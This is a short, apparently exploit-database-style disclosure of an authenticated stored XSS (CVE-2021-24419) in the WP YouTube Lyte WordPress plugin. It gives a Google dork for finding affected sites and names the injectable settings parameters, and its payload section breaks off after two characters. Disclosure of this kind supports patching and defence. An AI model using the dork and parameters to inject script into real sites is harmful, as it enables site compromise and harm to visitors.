/*! - # VULNERABILITY: WP YouTube Lyte WordPress Plugin <= 1.7.15 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/wp-youtube-lyte/ - # DATE: 2021-05-03 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Frank Goossens [ http://blog.futtta.be ] - # SOFTWARE VERSION: <= 1.7.15 - # SOFTWARE LINK: https://wordpress.org/plugins/wp-youtube-lyte/ - # CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N - # CWE: CWE-79 - # CVE: CVE-2021-24419 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the WP YouTube Lyte plugin through v1.7.15 for WordPress. [i] Vulnerable parameter(s): &lyte_notification=, &lyte_yt_api_key=. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] ">